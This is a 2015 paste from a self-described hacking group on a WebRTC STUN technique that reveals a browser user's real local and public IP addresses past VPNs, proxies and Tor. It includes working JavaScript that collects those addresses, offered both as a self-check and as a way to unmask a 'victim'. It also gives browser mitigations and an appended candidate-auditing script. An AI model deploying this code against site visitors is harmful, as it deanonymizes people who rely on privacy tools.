_d3f4ult

[+] STUN IP Address requests for WebRTC [+]

Feb 1st, 2015
We are...
//Laughing at your security since 2012*
=================================================================================================
Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
- Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
- Razar - MR.WWW - AN0NT0XIC
=================================================================================================
#WebRTC #STUN #Servers #Javascript #Requests #IP #Disclosure #Proxy #VPN #Tor #Exploit #FBI #NSA

This technique bypasses proxies, VPNs and Tor to reveal your (or a victim's) real IP address, because the STUN requests are made outside of the normal XMLHttpRequest procedure. Firefox and Chrome implement WebRTC, which allows requests to STUN servers that return the user's local and public IP addresses. The results of these requests are available to JavaScript, so a page can now obtain a user's local and public IP addresses in *JavaScript*. Below is how to check whether you are vulnerable and demo it yourself ;)

[+] WebRTC_STUN.html [+]
http://pastebin.com/PNsuhdUf

[+] How to Patch [+]
Chrome users should install the WebRTC block extension or ScriptSafe, which should block the vulnerability.

Firefox users should use the NoScript add-on
or
alternatively, type “about:config” in the address bar and set the “media.peerconnection.enabled” setting to false.

Or copy and paste the code below into the web browser's developer console (F12) to check whether you are vulnerable:
----------------------------------------------------------------------------------------

//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate){

            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
            var match = ip_regex.exec(ice.candidate.candidate);

            //skip candidates without an IPv4 address (IPv6 or mDNS host names)
            if(!match)
                return;
            var ip_addr = match[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);

            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});

    }, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});
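
To confirm that one of the mitigations under "How to Patch" took effect, the candidate strings a browser produces can be classified by what they disclose. This is an added example, not part of the original paste: the function names and the sample candidate lines are constructed for illustration, and it assumes the standard `candidate:` attribute layout used in SDP.

```javascript
// Added example. SAMPLE lines are constructed (documentation address ranges).
// candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type>
function parseCandidate(line) {
  var re = /^(?:a=)?candidate:(\S+) (\d+) (\S+) (\d+) (\S+) (\d+) typ (\S+)/i;
  var m = re.exec(String(line).trim());
  if (!m) return null;
  return { transport: m[3].toLowerCase(), address: m[5], port: Number(m[6]), type: m[7] };
}

// RFC 1918 private ranges plus IPv4 link-local.
function isPrivateIPv4(addr) {
  if (!/^\d{1,3}(\.\d{1,3}){3}$/.test(addr)) return false;
  var o = addr.split(".").map(Number);
  return o[0] === 10 || (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
    (o[0] === 192 && o[1] === 168) || (o[0] === 169 && o[1] === 254);
}

// Label one candidate by what it would disclose to page script.
function classify(line) {
  var c = parseCandidate(line);
  if (!c) return "unparsed";
  if (/\.local$/i.test(c.address)) return "mdns-obfuscated"; // host name, no IP
  if (c.type === "host") return isPrivateIPv4(c.address) ? "local-ip" : "interface-ip";
  if (c.type === "srflx" || c.type === "prflx") return "stun-reflexive-ip";
  if (c.type === "relay") return "relay-only";
  return "other";
}

// Count labels; `exposed` is true when any candidate carries the user's own address.
function audit(lines) {
  var report = { exposed: false };
  lines.forEach(function (l) {
    var k = classify(l);
    report[k] = (report[k] || 0) + 1;
    if (k === "local-ip" || k === "interface-ip" || k === "stun-reflexive-ip") report.exposed = true;
  });
  return report;
}

var SAMPLE = [
  "candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host",
  "candidate:2 1 udp 1686052607 203.0.113.7 54321 typ srflx raddr 192.168.1.23 rport 54321",
  "candidate:3 1 udp 2122260223 3f2a9c1e-0000-4000-8000-abcdefabcdef.local 54321 typ host",
  "candidate:4 1 udp 41885439 198.51.100.9 3478 typ relay raddr 0.0.0.0 rport 0"
];
console.log(audit(SAMPLE));
```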